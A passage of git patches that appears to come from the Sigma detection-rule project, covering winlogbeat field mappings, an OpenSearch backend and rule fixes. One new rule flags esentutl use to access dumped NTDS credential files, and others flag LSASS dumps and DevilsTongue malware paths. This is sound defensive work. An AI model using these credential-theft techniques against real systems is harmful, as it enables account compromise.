7045 + RestrictedSidCount: winlog.event_data.RestrictedSidCount + RpcCallClientLocality: winlog.event_data.RpcCallClientLocality + SamAccountName: winlog.event_data.SamAccountName + ScriptPath: winlog.event_data.ScriptPath + Service: winlog.event_data.Service + ServiceAccount: winlog.event_data.ServiceAccount + ServiceFileName: winlog.event_data.ServiceFileName ServiceName: service=security: service.name default: winlog.event_data.ServiceName - ImagePath: winlog.event_data.ImagePath + ServicePrincipalNames: winlog.event_data.ServicePrincipalNames + ServiceSid: winlog.event_data.ServiceSid + ServiceStartType: winlog.event_data.ServiceStartType ServiceType: winlog.event_data.ServiceType - StartType: winlog.event_data.ServiceStartType + SessionId: winlog.event_data.SessionId + SessionName: winlog.event_data.SessionName + ShareLocalPath: winlog.event_data.ShareLocalPath + ShareName: winlog.event_data.ShareName + SidHistory: winlog.event_data.SidHistory + SidList: winlog.event_data.SidList + SourceAddress: source.ip + Status: winlog.event_data.Status + StartType: winlog.event_data.StartType + SubcategoryGuid: winlog.event_data.SubcategoryGuid + SubcategoryId: winlog.event_data.SubcategoryId + SubjectDomainName: + service=security: user.domain + default: winlog.event_data.SubjectDomainName + SubjectUserName: + service=security: user.name + default: winlog.event_data.SubjectUserName + SubjectUserSid: + service=security: user.id + default: winlog.event_data.SubjectUserSid + SubStatus: winlog.event_data.SubStatus + TargetDomainName: user.domain + TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId + TargetLogonId: + service=security: winlog.logon.id + default: winlog.event_data.TargetLogonId + TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName + TargetOutboundUserName: winlog.event_data.TargetOutboundUserName + TargetServerName: winlog.event_data.TargetServerName + TargetSid: winlog.event_data.TargetSid + TargetUserName: + service=security:user.name + default: winlog.event_data.TargetUserName + TargetUserSid: + service=security:user.id + default: winlog.event_data.TargetUserSid + TaskContent: winlog.event_data.TaskContent + TaskName: winlog.event_data.TaskName + TicketEncryptionType: winlog.event_data.TicketEncryptionType + TicketOptions: winlog.event_data.TicketOptions + TokenElevationType: winlog.event_data.TokenElevationType + TransactionId: winlog.event_data.TransactionId + TransmittedServices: winlog.event_data.TransmittedServices + UserAccountControl: winlog.event_data.UserAccountControl + UserParameters: winlog.event_data.UserParameters + UserPrincipalName: winlog.event_data.UserPrincipalName + UserWorkstations: winlog.event_data.UserWorkstations + VirtualAccount: winlog.event_data.VirtualAccount + Workstation: winlog.event_data.Workstation + WorkstationName: source.domain From 0b053e79ccd48cb33169d3cf95e066c9efe8e16c Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 13:33:39 +0200 Subject: [PATCH 0179/1367] fix syntax error --- tools/config/winlogbeat-modules-enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 8fd145f2..ff1cfa43 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -468,7 +468,7 @@ fieldmappings: TargetServerName: winlog.event_data.TargetServerName TargetSid: winlog.event_data.TargetSid TargetUserName: - service=security:user.name + service=security: user.name default: winlog.event_data.TargetUserName TargetUserSid: service=security:user.id From 4b44ee654b450c1c41410e89edcaebfa4906e4bc Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 13:36:18 +0200 Subject: [PATCH 0180/1367] Fix missing a space --- tools/config/winlogbeat-modules-enabled.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index ff1cfa43..3173527a 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -460,18 +460,18 @@ fieldmappings: SubStatus: winlog.event_data.SubStatus TargetDomainName: user.domain TargetLinkedLogonId: winlog.event_data.TargetLinkedLogonId - TargetLogonId: + TargetLogonId: service=security: winlog.logon.id default: winlog.event_data.TargetLogonId TargetOutboundDomainName: winlog.event_data.TargetOutboundDomainName TargetOutboundUserName: winlog.event_data.TargetOutboundUserName TargetServerName: winlog.event_data.TargetServerName TargetSid: winlog.event_data.TargetSid - TargetUserName: + TargetUserName: service=security: user.name default: winlog.event_data.TargetUserName - TargetUserSid: - service=security:user.id + TargetUserSid: + service=security: user.id default: winlog.event_data.TargetUserSid TaskContent: winlog.event_data.TaskContent TaskName: winlog.event_data.TaskName From b1fb462c39ddce4925088fef1eac2723f8e49c88 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 5 Aug 2021 15:46:01 +0200 Subject: [PATCH 0181/1367] Update powershell_timestomp.yml --- rules/windows/powershell/powershell_timestomp.yml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_timestomp.yml b/rules/windows/powershell/powershell_timestomp.yml index bc0cb449..5c53560c 100644 --- a/rules/windows/powershell/powershell_timestomp.yml +++ b/rules/windows/powershell/powershell_timestomp.yml @@ -3,9 +3,7 @@ id: c6438007-e081-42ce-9483-b067fbef33c3 status: experimental author: frack113 date: 2021/08/03 -description: | - Adversaries may modify file time attributes to hide new or changes to existing files. - Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. +description: Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md - https://www.offensive-security.com/metasploit-unleashed/timestomp/ @@ -30,4 +28,4 @@ detection: condition: selection_id and selection_ioc falsepositives: - legitime admin script -level: medium \ No newline at end of file +level: medium From 3634901bf1fe6683ac5093b56868fa4e807a377a Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 5 Aug 2021 15:47:29 +0200 Subject: [PATCH 0182/1367] Update poweshell_detect_vm_env.yml --- rules/windows/powershell/poweshell_detect_vm_env.yml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/poweshell_detect_vm_env.yml b/rules/windows/powershell/poweshell_detect_vm_env.yml index 2e30001f..7b810af9 100644 --- a/rules/windows/powershell/poweshell_detect_vm_env.yml +++ b/rules/windows/powershell/poweshell_detect_vm_env.yml @@ -3,9 +3,7 @@ id: d93129cd-1ee0-479f-bc03-ca6f129882e3 status: experimental author: frack113 date: 2021/08/03 -description: | - Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. - This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox +description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md - https://techgenix.com/malicious-powershell-scripts-evade-detection/ @@ -28,4 +26,4 @@ detection: condition: all of selection_* falsepositives: - Unknown -level: medium \ No newline at end of file +level: medium From b353a106439e5f95f66482ca1978e19fb4766123 Mon Sep 17 00:00:00 2001 From: RedKyper Date: Thu, 5 Aug 2021 20:37:07 +0200 Subject: [PATCH 0183/1367] elastalert multi output file --- tools/sigma/backends/elasticsearch.py | 12 +++++++----- tools/sigma/sigmac.py | 18 ++++-------------- 2 files changed, 11 insertions(+), 19 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index b00a1107..ead21368 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1321,6 +1321,7 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): self.elastalert_alerts[rule_object['name']] = rule_object #Clear fields self.fields = [] + return str(yaml.dump(rule_object, default_flow_style=False, width=10000)) def generateNode(self, node): #Save fields for adding them in query_key @@ -1369,11 +1370,12 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): }.get(level, 2) def finalize(self): - result = "" - for rulename, rule in self.elastalert_alerts.items(): - result += yaml.dump(rule, default_flow_style=False, width=10000) - result += '\n' - return result + pass + # result = "" + # for rulename, rule in self.elastalert_alerts.items(): + # result += yaml.dump(rule, default_flow_style=False, width=10000) + # result += '\n' + # return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): """Elastalert backend""" diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 0da400c2..5a382b50 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -252,7 +252,6 @@ def main(): nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - newline_separator = '\0' if cmdargs.print0 else '\n' for result in results: @@ -275,21 +274,12 @@ def main(): exit(ERR_OUTPUT) print(result, file=out, end=newline_separator) - if nb_result == 0: # elastalert return "results=[]" so get a error with out not def - if not fileprefix == None and not inc_filenane == None: #yml action + if nb_result == 0: # backend get only 1 output + if not fileprefix == None: # want a prefix anyway try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) - inc_filenane += 1 - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) - elif not fileprefix == None and inc_filenane == None: # a simple yml - try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) + filename = "%s%s_nono_output%s" % (fileprefix,cmdargs.target,filename_ext) out = open(filename, "w", encoding='utf-8') + fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) From 4a8192fecc78f8df0c74b6edfab69d7992eb48ff Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 22:38:48 +0200 Subject: [PATCH 0184/1367] fix typo mono --- tools/sigma/sigmac.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 5a382b50..05f12299 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -277,7 +277,7 @@ def main(): if nb_result == 0: # backend get only 1 output if not fileprefix == None: # want a prefix anyway try: - filename = "%s%s_nono_output%s" % (fileprefix,cmdargs.target,filename_ext) + filename = "%s%s_mono_output%s" % (fileprefix,cmdargs.target,filename_ext) out = open(filename, "w", encoding='utf-8') fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: From 96911e55b954000e1488215c01a3131a4b42dc98 Mon Sep 17 00:00:00 2001 From: Sam0x90 Date: Fri, 6 Aug 2021 00:55:57 +0400 Subject: [PATCH 0185/1367] Adding detection rule for esentutl utility Used by Conti affiliates to target NTDS file and MSEdge info --- .../process_creation/Conti_esentutl.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/windows/process_creation/Conti_esentutl.yaml diff --git a/rules/windows/process_creation/Conti_esentutl.yaml b/rules/windows/process_creation/Conti_esentutl.yaml new file mode 100644 index 00000000..7a29a633 --- /dev/null +++ b/rules/windows/process_creation/Conti_esentutl.yaml @@ -0,0 +1,32 @@ +title: Detection of esentutl aka Extensible Storage Engine Utilities to gather credentials +id: 7df1713a-1a5b-4a4b-a071-dc83b144a101 +status: experimental +author: sam0x90 +date: 2021/08/06 +description: Conti recommendation to its affiliates to use esentult to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module "pwgrab" +references: + - https://twitter.com/vxunderground/status/1423336151860002816 + - https://attack.mitre.org/software/S0404/ + - https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ +tags: + - attack.credential_access + - attack.t1003 + - attack.t1003.003 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'esentutl' + selection_password: + CommandLine|contains: ' /p' + condition: all of them +falsepositives: + - To be determined +level: medium +fields: + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory \ No newline at end of file From faba4f481b7808d04b04a23381df1276fe273cdb Mon Sep 17 00:00:00 2001 From: Young Date: Thu, 5 Aug 2021 18:50:18 -0700 Subject: [PATCH 0186/1367] initial commit --- tools/config/winlogbeat.yml | 1 + tools/sigma/backends/base.py | 2 + .../sigma/backends/defaultOpensearchValues.py | 11 + tools/sigma/backends/opensearch.py | 550 ++++++++++++++++++ tools/sigma/sigmac.py | 4 + 5 files changed, 568 insertions(+) create mode 100644 tools/sigma/backends/defaultOpensearchValues.py create mode 100644 tools/sigma/backends/opensearch.py diff --git a/tools/config/winlogbeat.yml b/tools/config/winlogbeat.yml index 87ffb4ac..d640f433 100644 --- a/tools/config/winlogbeat.yml +++ b/tools/config/winlogbeat.yml @@ -10,6 +10,7 @@ backends: - elastalert - elastalert-dsl - ee-outliers + - os-monitor logsources: windows: product: windows diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index e9901e06..91d2bf1b 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -117,6 +117,7 @@ class BaseBackend: if len(sigmaparser.condparsed) > 1: raise NotImplementedError("Base backend doesn't support multiple conditions") for parsed in sigmaparser.condparsed: + print(f'\nParsed: {parsed}\n') query = self.generateQuery(parsed) before = self.generateBefore(parsed) after = self.generateAfter(parsed) @@ -133,6 +134,7 @@ class BaseBackend: def generateQuery(self, parsed): result = self.generateNode(parsed.parsedSearch) + print(f'\nResult: {result}\n') if parsed.parsedAgg: result += self.generateAggregation(parsed.parsedAgg) #result = self.applyOverrides(result) diff --git a/tools/sigma/backends/defaultOpensearchValues.py b/tools/sigma/backends/defaultOpensearchValues.py new file mode 100644 index 00000000..b31d28c6 --- /dev/null +++ b/tools/sigma/backends/defaultOpensearchValues.py @@ -0,0 +1,11 @@ +RULE_TYPE = "monitor" +IS_ENABLED = True +INTERVAL = 5 +UNIT = "MINUTES" +TRIGGER_NAME = "generated-trigger" +SEVERITIES = {"informational": "5", "low": "4", "medium": "3", "high": "2", "critical": "1"} +RESULTS_INDEX = 0 +TRIGGER_INEQUALITY = ">" +TRIGGER_THRESHOLD = 0 +TRIGGER_LANGUAGE = "painless" +MONITOR_INDICES = ["opensearch-security-logs"] \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py new file mode 100644 index 00000000..c57f7cbd --- /dev/null +++ b/tools/sigma/backends/opensearch.py @@ -0,0 +1,550 @@ +# Output backends for sigmac +# Copyright 2016-2018 Thomas Patzke, Florian Roth, Devin Ferguson, Julien Bachmann + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import json +import re +from fnmatch import fnmatch +import sys +import os +from random import randrange +from distutils.util import strtobool +from uuid import uuid4 + +import sigma +import yaml +from sigma.parser.modifiers.type import SigmaRegularExpressionModifier, SigmaTypeModifier +from sigma.parser.condition import ConditionOR, ConditionAND, NodeSubexpression, SigmaAggregationParser, SigmaConditionParser, SigmaConditionTokenizer + +from sigma.config.mapping import ConditionalFieldMapping +from .base import BaseBackend, SingleTextQueryBackend +from .mixins import RulenameCommentMixin, MultiRuleOutputMixin +from .exceptions import NotSupportedError +from .defaultOpensearchValues import * + +class DeepFieldMappingMixin(object): + def fieldNameMapping(self, fieldname, value): + if isinstance(fieldname, str): + get_config = self.sigmaconfig.fieldmappings.get(fieldname) + if not get_config and '|' in fieldname: + fieldname = fieldname.split('|', 1)[0] + get_config = self.sigmaconfig.fieldmappings.get(fieldname) + if isinstance(get_config, ConditionalFieldMapping): + condition = self.sigmaconfig.fieldmappings.get(fieldname).conditions + for key, item in self.logsource.items(): + if condition.get(key) and condition.get(key, {}).get(item): + new_fieldname = condition.get(key, {}).get(item) + if any(new_fieldname): + return super().fieldNameMapping(new_fieldname[0], value) + return super().fieldNameMapping(fieldname, value) + + def generate(self, sigmaparser): + self.logsource = sigmaparser.parsedyaml.get("logsource", {}) + return super().generate(sigmaparser) + +class OpenSearchWildcardHandlingMixin(object): + """ + Determine field mapping to keyword subfields depending on existence of wildcards in search values. Further, + provide configurability with backend parameters. + """ + options = SingleTextQueryBackend.options + ( + ("keyword_field", "keyword", "Keyword sub-field name (default is: '.keyword'). Set blank value if all keyword fields are the base(top-level) field. Additionally see 'keyword_base_fields' for more granular control of the base & subfield situation.", None), + ("analyzed_sub_field_name", "", "Analyzed sub-field name. By default analyzed field is the base field. Therefore, use this option to make the analyzed field a subfield. An example value would be '.text' ", None), + ("analyzed_sub_fields", None, "Fields that have an analyzed sub-field.", None), + ("keyword_base_fields", None, "Fields that the keyword is base (top-level) field. By default analyzed field is the base field. So use this option to change that logic. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("keyword_whitelist", None, "Fields to always set as keyword. Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("keyword_blacklist", None, "Fields to never set as keyword (ie: always set as analyzed field). Bypasses case insensitive options. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), + ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), + ) + reContainsWildcard = re.compile("(?:(?\\*", value ) + # Make upper/lower + value = re.sub( r"[A-Za-z]", lambda x: "[" + x.group( 0 ).upper() + x.group( 0 ).lower() + "]", value ) + # Turn `.` into wildcard, only if odd number of '\'(because this would mean already escaped) + value = re.sub( r"(((?\.", value ) + # Turn `*` into wildcard, only if odd number of '\'(because this would mean already escaped) + value = re.sub( r"(((?.*", value ) + # Escape additional values that are treated as specific "operators" within Elastic. (ie: @, ?, &, <, >, and ~) + # reference: https://www.elastic.co/guide/en/elasticsearch/reference/current/regexp-syntax.html#regexp-optional-operators + value = re.sub( r"(((?])", "\g<1>\\\\\g<4>", value ) + # Validate regex + try: + re.compile(value) + return {'is_regex': True, 'value': value} + # Regex failed + except re.error: + raise TypeError( "Regular expression validation error for: '%s')" %str(value) ) + else: + return { 'is_regex': False, 'value': value } + +class OpenSearchQuerystringBackend(DeepFieldMappingMixin, OpenSearchWildcardHandlingMixin, SingleTextQueryBackend): + """Converts Sigma rule into OpenSearch query string. Only searches, no aggregations.""" + identifier = "es-qs" + active = True + + reEscape = re.compile("([\s+\\-=!(){}\\[\\]^\"~:/]|(?", ">="]: + raise NotImplementedError("Threshold rules can only handle > and >= operators") + if agg.aggfield: + raise NotImplementedError("Threshold rules cannot COUNT(DISTINCT %s)" % agg.aggfield) + self.rule_threshold = { + "field": agg.groupfield if agg.groupfield else [], + "value": int(agg.condition) if agg.cond_op == ">=" else int(agg.condition) + 1 + } + return "" + raise NotImplementedError("Aggregation %s is not implemented for this backend" % agg.aggfunc_notrans) \ No newline at end of file diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 0da400c2..7bbeaeb0 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -214,7 +214,10 @@ def main(): exit(ERR_CONFIG_PARSING) backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) + print(f'backend options: {cmdargs.backend_config}') backend = backend_class(sigmaconfigs, backend_options) + print(f'sigma configs: {backend_options}') + print(f'backend: {backend}') filename_ext = cmdargs.output_extention filename = cmdargs.output @@ -248,6 +251,7 @@ def main(): else: f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) + print(f'\nparser: {parser.parsers[0].condtoken} \n {parser.parsers[0].condparsed[0]}\n') results = parser.generate(backend) nb_result = len(list(copy.deepcopy(results))) From cf8d8d3ed48bf4b85fe762e3b840c4225ddc4d8d Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 6 Aug 2021 08:43:05 +0200 Subject: [PATCH 0187/1367] fix TargetFilename case error --- .../windows/file_event/sysmon_cve_2021_26858_msexchange.yml | 2 +- .../file_event/sysmon_lsass_memory_dump_file_creation.yml | 2 +- rules/windows/file_event/win_cve_2021_1675_printspooler.yml | 2 +- rules/windows/other/win_tool_psexec.yml | 6 +++--- .../sysmon_cve_2021_31979_cve_2021_33771_exploits.yml | 3 ++- 5 files changed, 8 insertions(+), 7 deletions(-) diff --git a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml index 2e18fec7..0b4ba06e 100644 --- a/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml +++ b/rules/windows/file_event/sysmon_cve_2021_26858_msexchange.yml @@ -30,6 +30,6 @@ detection: condition: selection and not filter fields: - ComputerName - - TargetFileName + - TargetFilename falsepositives: - Unknown diff --git a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml index b61b425a..6db46020 100755 --- a/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml +++ b/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml @@ -20,7 +20,7 @@ detection: condition: selection fields: - ComputerName - - TargetFileName + - TargetFilename falsepositives: - Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator level: medium diff --git a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml index 74ae412f..60ee7dca 100644 --- a/rules/windows/file_event/win_cve_2021_1675_printspooler.yml +++ b/rules/windows/file_event/win_cve_2021_1675_printspooler.yml @@ -24,6 +24,6 @@ detection: condition: selection fields: - ComputerName - - TargetFileName + - TargetFilename falsepositives: - Unknown diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 3dee48d0..22a4d3da 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -5,7 +5,7 @@ status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke date: 2017/06/12 -modified: 2021/05/16 +modified: 2021/08/06 references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet @@ -22,7 +22,7 @@ fields: - ParentCommandLine - ServiceName - ServiceFileName - - TargetFileName + - TargetFilename - PipeName falsepositives: - unknown @@ -60,4 +60,4 @@ logsource: product: windows detection: sysmon_filecreation: - TargetFileName|endswith: '\PSEXESVC.exe' + TargetFilename|endswith: '\PSEXESVC.exe' diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index cdede4a8..f2ec067c 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -5,6 +5,7 @@ status: experimental description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum author: Sittikorn S date: 2021/07/16 +modified: 2021/08/06 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -24,7 +25,7 @@ logsource: category: file_event detection: selection: - TargetFileName|contains: + TargetFilename|contains: - 'C:\Windows\system32\physmem.sys' - 'C:\Windows\System32\IME\IMEJP\imjpueact.dll' - 'C:\Windows\system32\ime\IMETC\IMTCPROT.DLL' From 0078ee795b27305e3dfe41be6bf036930fb6b792 Mon Sep 17 00:00:00 2001 From: Lei Chen Date: Fri, 6 Aug 2021 16:47:35 +0800 Subject: [PATCH 0188/1367] chore: update sigma ci badge Replace travis-ci tatus badge with github actions tatus badge --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 424533b5..c5ead69f 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -[![Build Status](https://travis-ci.org/Neo23x0/sigma.svg?branch=master)](https://travis-ci.org/Neo23x0/sigma) +![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master) ![sigma_logo](./images/Sigma_0.3.png) From 932fe14cf69be50e65d567caaa87c33e12d2acdd Mon Sep 17 00:00:00 2001 From: Lei Chen Date: Fri, 6 Aug 2021 16:51:19 +0800 Subject: [PATCH 0189/1367] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c5ead69f..3fb50937 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master) +[![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master)](https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster) ![sigma_logo](./images/Sigma_0.3.png) From 65251e13e9fac26e3fcfa18a6fa01246cedbf3c0 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 6 Aug 2021 10:52:24 +0200 Subject: [PATCH 0190/1367] Add missing system field --- tools/config/winlogbeat-modules-enabled.yml | 25 ++++++++++++++++++--- 1 file changed, 22 insertions(+), 3 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 3173527a..21b4b19f 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -108,6 +108,8 @@ defaultindex: winlogbeat-* fieldmappings: EventID: event.code Channel: winlog.channel + #Keywords: from "Value" is lost with winlogbeat exist in nxlog + provider name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType @@ -135,8 +137,6 @@ fieldmappings: ClassName: winlog.event_data.ClassName ClassId: winlog.event_data.ClassId DeviceDescription: winlog.event_data.DeviceDescription - # DeviceName => Microsoft-Windows-Ntfs EventID: 98 - DeviceName: winlog.event_data.DeviceName # ErrorCode => printservice-admin EventID: 4909 or 808 ErrorCode: winlog.event_data.ErrorCode FilePath: winlog.event_data.FilePath @@ -211,7 +211,10 @@ fieldmappings: SchemaVersion: winlog.event_data.SchemaVersion ImageLoaded: file.path Signed: file.code_signature.signed - Signature: file.code_signature.subject_name + Signature: + category=driver_loaded: file.code_signature.subject_name + category=image_loaded: file.code_signature.subject_name + default: winlog.event_data.Signature SignatureStatus: file.code_signature.status SourceProcessGuid: process.entity_id SourceProcessId: process.pid @@ -487,3 +490,19 @@ fieldmappings: VirtualAccount: winlog.event_data.VirtualAccount Workstation: winlog.event_data.Workstation WorkstationName: source.domain + # + # System + # + DriveName: winlog.event_data.DriveName + DeviceName: winlog.event_data.DeviceName + HeaderFlags: winlog.event_data.HeaderFlags + Severity: winlog.event_data.Severity + Origin: winlog.event_data.Origin + Verb: winlog.event_data.Verb + Outcome: winlog.event_data.Outcome + SampleLength: winlog.event_data.SampleLength + SampleData: winlog.event_data.SampleData + SourceFile: winlog.event_data.SourceFile + SourceLine: winlog.event_data.SourceLine + SourceTag: winlog.event_data.SourceTag + CallStack: winlog.event_data.CallStack From f4bef0fc39faa2568f1c7216b0a9e1a2a4f05a36 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 6 Aug 2021 11:12:34 +0200 Subject: [PATCH 0191/1367] Add Microsoft-Windows-Windows Defender/Operational --- .../other/win_defender_amsi_trigger.yml | 3 +- tools/config/winlogbeat-modules-enabled.yml | 41 ++++++++++++++++++- 2 files changed, 42 insertions(+), 2 deletions(-) diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index bd133c8f..f872bf22 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -2,6 +2,7 @@ title: Windows Defender AMSI Trigger Detected id: ea9bf0fa-edec-4fb8-8b78-b119f2528186 description: Detects triggering of AMSI by Windows Defender. date: 2020/09/14 +modified: 2021/08/06 author: Bhabesh Raj references: - https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps @@ -12,7 +13,7 @@ logsource: detection: selection: EventID: 1116 - DetectionSource: 'AMSI' + Source Name: 'AMSI' condition: selection falsepositives: - unlikely diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 21b4b19f..0736a30f 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -116,7 +116,6 @@ fieldmappings: FailureCode: winlog.event_data.FailureCode FileName: file.path HiveName: winlog.event_data.HiveName - Path: winlog.event_data.Path ProcessCommandLine: winlog.event_data.ProcessCommandLine SecurityID: winlog.event_data.SecurityID Source: winlog.event_data.Source @@ -506,3 +505,43 @@ fieldmappings: SourceLine: 